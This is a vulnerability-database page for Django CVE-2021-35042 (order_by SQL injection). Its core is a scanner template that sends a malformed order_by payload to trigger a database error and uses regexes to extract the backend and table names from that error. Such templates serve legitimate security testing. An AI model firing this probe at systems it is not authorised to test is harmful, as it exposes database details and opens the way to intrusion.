| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
| Security fix for the ALT Linux 10 package python3-module-django version 3.2.6-alt1 | 10 Sep 202100:00 | – | altlinux | |
| Exploit for SQL Injection in Djangoproject Django | 24 Sep 202115:30 | – | githubexploit | |
| CVE-2021-35042 | 2 Jul 202110:15 | – | attackerkb | |
| CVE-2021-35042 | 2 Jul 202109:54 | – | alpinelinux | |
| [ASA-202107-11] python-django: insufficient validation | 3 Jul 202100:00 | – | archlinux | |
| The vulnerability of the QuerySet.order_by() function in the Django web application framework allows a hacker to execute arbitrary commands. | 13 Jul 202100:00 | – | bdu_fstec | |
| CVE-2021-35042 | 11 Jul 202113:57 | – | circl | |
| Django SQL注入漏洞 | 1 Jul 202100:00 | – | cnnvd | |
| Django SQL Injection Vulnerability (CNVD-2021-49046) | 2 Jul 202100:00 | – | cnvd | |
| CVE-2021-35042 | 2 Jul 202109:54 | – | cve |
id: CVE-2021-35042
info:
name: Django QuerySet.order_by - SQL Injection
author: 0x_Akoko
severity: critical
description: |
Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 contain a SQL injection caused by untrusted input in QuerySet.order_by, letting attackers execute arbitrary SQL commands, exploit requires attacker to control order_by input.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data leakage, modification, or deletion.
remediation: |
Update to Django 3.1.13 or 3.2.5 or later versions.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35042
- https://github.com/zer0qs/CVE-2021-35042
- https://github.com/django/django/commit/a34a5f724c5d5adb2109374ba3989ebb7b11f81f
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-35042
cwe-id: CWE-89
epss-score: 0.38424
epss-percentile: 0.97091
metadata:
verified: true
max-request: 1
fofa-query: body="ProgrammingError" && body="ORDER BY"
tags: cve,cve2021,django,sqli
http:
- raw:
- |
GET /?order_by=vuln.x]-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains_all(body, "ProgrammingError", "ORDER BY") || contains_all(body, "DatabaseError", "ORDER BY")'
- 'contains_any(body, "psycopg2", "MySQLdb", "sqlite3", "cx_Oracle")'
condition: and
extractors:
- type: regex
name: database
part: body
group: 1
regex:
- "django\\.db\\.backends\\.(postgresql|mysql|sqlite3|oracle)"
- type: regex
name: tables
part: body
group: 1
regex:
- 'FROM\s+"([a-zA-Z_][a-zA-Z0-9_]*)"'
- 'FROM\s+`([a-zA-Z_][a-zA-Z0-9_]*)`'
- 'relation\s+([a-zA-Z_][a-zA-Z0-9_]*)'
- "Table\\s+'[^']*\\.([a-zA-Z_][a-zA-Z0-9_]*)'"
# digest: 4b0a00483046022100dc2dd1f6aa0c52eaab3fe8c3d5d4d2bd440c39035dd8745a15f07f2d19e4e246022100ed663fb2a6613a6e06db23667020926e1ddd21ed4839afcb6ef8ee5919d6a646:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation